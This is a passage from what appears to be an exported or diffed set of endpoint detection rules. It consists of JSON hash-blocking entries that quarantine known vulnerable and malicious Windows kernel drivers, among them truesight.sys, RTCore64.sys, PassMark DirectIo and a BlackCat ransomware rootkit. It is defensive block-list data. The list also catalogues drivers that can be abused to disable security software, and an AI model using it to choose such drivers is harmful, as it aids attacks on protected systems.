[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85e21733-1f36-5c31-8c10-e43e51b18d92", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978721Z", + "creation_date": "2026-03-23T11:45:29.978723Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978729Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f246b9d22b3ffe15f2e97f306d049020f38ed162150c97d7a72e3ae0b22c79ad", + "comment": "Vulnerable Kernel Driver (aka PanIO.sys) [https://www.loldrivers.io/drivers/5f70bde4-9f81-44a8-9d3e-c6c7cf65bfae/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85e3ab86-5a3d-50a2-a3e3-2d62d59446a2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156569Z", + "creation_date": "2026-03-23T11:45:31.156571Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156576Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e2f3eaa8c165f2aabf97f24b14946b9a196317ee3082a26b82232bbab4bdba12", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85e5a15d-d525-58ac-985f-f68251796e67", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480469Z", + "creation_date": "2026-03-23T11:45:30.480472Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480477Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "edbb23e74562e98b849e5d0eefde3af056ec6e272802a04b61bebd12395754e5", + "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85ea8871-35a0-505f-9f4a-e0ca3acbf671", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142611Z", + "creation_date": "2026-03-23T11:45:32.142614Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142620Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1cd219f58b249a2e4f86553bdd649c73785093e22c87170798dae90f193240af", + "comment": "KingSoft Antivirus Security System Driver (aka ksapi64.sys and ksapi64_del.sys) [https://github.com/BlackSnufkin/BYOVD/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85ee9ba9-6420-5989-8246-afb39bca62f5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146435Z", + "creation_date": "2026-03-23T11:45:32.146437Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146442Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a74c2bde0c9a76486657ccb9c79ea87c9891a32cdd4aa15c7542f7c9487a539", + "comment": "Malicious Kernel Driver (aka driver_1a74c2bd.sys) [https://www.loldrivers.io/drivers/af153e7c-13fa-4a40-a095-00726ad6d783/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "85f4e67a-c2f9-5cb1-a105-c66d5690fc4f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815897Z", + "creation_date": "2026-03-23T11:45:30.815899Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815905Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65cf1a886b3e3ec8070bde31cb8e254cd623de1e8c7dd71248b84e6de77a08e6", + "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "86017052-d7f2-5138-b7b0-b4ca8d2ead61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": 
{ + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607724Z", + "creation_date": "2026-03-23T11:45:29.607725Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607738Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "862d0ff27bb086145a33b9261142838651b0d2e1403be321145e197600eb5015", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "860e59bf-7bdf-5580-93bd-221822578e34", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454536Z", + "creation_date": "2026-03-23T11:45:30.454539Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454548Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "84cec13cf0e77ec889e6e01a265a8a5507c6e7d8b0ad6e971f346d2514a758fe", + "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) 
[https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "86138443-ba7c-5a09-8c22-7e5c255d6c97", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834186Z", + "creation_date": "2026-03-23T11:45:30.834189Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834198Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d32a94e7f1d7ef2c5449dfbcd01274f8943fb506f41b29fad00d4db71e8dcd0a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "861eb644-e365-58aa-8c2c-1b969b2448a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140381Z", + "creation_date": 
"2026-03-23T11:45:31.140383Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140389Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9947a8428d025a046e5d9d8802d9a1884ddb324c52653abeffc1f501195b6931", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "86266002-a6d6-5ddd-86d1-fb04af9c9c98", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153596Z", + "creation_date": "2026-03-23T11:45:31.153598Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153603Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f198254936c2675e7137733f1f927da705f7535e401fa6d87be14bd6d57fa46f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "862a2e41-bc36-59ea-8c4e-a7c9eafafde6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967177Z", + "creation_date": "2026-03-23T11:45:29.967181Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967190Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2b03a8bad9ecfcacc8e8a21ee310ce359e1382d7a5d5ce5284b32ecc2bcc4b8a", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "862b710a-71ec-5732-8ce5-f786dfb875d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812635Z", + "creation_date": "2026-03-23T11:45:31.812638Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812652Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a683ab7ebe5f4ac157908267f80123d548e1b273cea57e2485ec8ddc81820085", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "86309dca-5932-52b4-9555-a809c55a3615", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479603Z", + "creation_date": "2026-03-23T11:45:31.479607Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479617Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9564153321652f89ce43a81efe351be6eb3a8f84e7b02f8c2162f2f297b6b18", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "863af704-e2b0-5ba6-a603-f42f06d519e6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481442Z", + "creation_date": "2026-03-23T11:45:30.481445Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481454Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d6cb3418c1a512aef6b15586bf5234689d4e471e854103a72d80a8597d263403", + "comment": "Vulnerable Kernel Driver (aka phymem_ext64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8663209f-cc28-5174-8de6-339b60246770", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835859Z", + "creation_date": "2026-03-23T11:45:30.835861Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835867Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14d0649d4833f904071a57baea3184dcb289e28661fb95cd532fa2f7440e3cc1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8663bc9f-bf28-524b-a8ba-00115f5114ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985485Z", + "creation_date": "2026-03-23T11:45:29.985487Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985492Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c", + "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka dkrTK.sys) [https://www.virustotal.com/gui/file/56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c/details] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8668aa98-3053-5d57-837c-e6a931bf0ee8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494986Z", + "creation_date": "2026-03-23T11:45:31.494988Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494994Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "87bcb6d213e862ffe9afd24a6417b02ccfd6a66808b130c803a7e1fa69eae2f7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "866f0ebd-2c0e-5a35-af58-8d3f6bbc3bc0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820618Z", + "creation_date": "2026-03-23T11:45:31.820621Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820629Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c4195b9e85d718e9ca5b53230be30020e457e4424327ebdd51aa48661c91350", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "86814cc3-188e-5d33-bdb7-e9150a679935", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479161Z", + "creation_date": "2026-03-23T11:45:30.479163Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479170Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "516f0bbbc1b47ec2d83cc51be104920899193e2784a45b835fe68f864af1733b", + "comment": "Vulnerable Kernel Driver (aka rtkiow8x64.sys ) [https://www.loldrivers.io/drivers/998ed67c-9c20-46ef-a6ba-abc606b540b9/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "86a08d35-5419-55f3-9bdd-733700b46825", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.488361Z", + "creation_date": "2026-03-23T11:45:31.488363Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488369Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e8a739fc928c76d792810c86641de94d9cc3ceb6a65576c6579c22d5775db51", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "86a142ca-6882-5595-aa3f-afe6ff9e6072", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490523Z", + "creation_date": "2026-03-23T11:45:31.490525Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490530Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "59e7ecb67e77d91f11e3ec07eef716cb99543f5715102423a1c9812fd97fac28", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "86a5eac9-3d44-5138-b12d-b59bb3276835", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485707Z", + "creation_date": "2026-03-23T11:45:31.485711Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485721Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dea05ba6d07c03fad203e2016f522a323ac69ddf7dd951bb675006a0711277d6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "86a68632-bbb9-5f36-9e66-77360cf1dc5d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.496074Z", + "creation_date": "2026-03-23T11:45:31.496076Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.496081Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2af1c26840590e3bddf622705cf2557a4781b1ac195de1df8e5ff7261ce8a6c6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "86bf9e70-aef7-5365-b648-88e4e60814ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461554Z", + "creation_date": 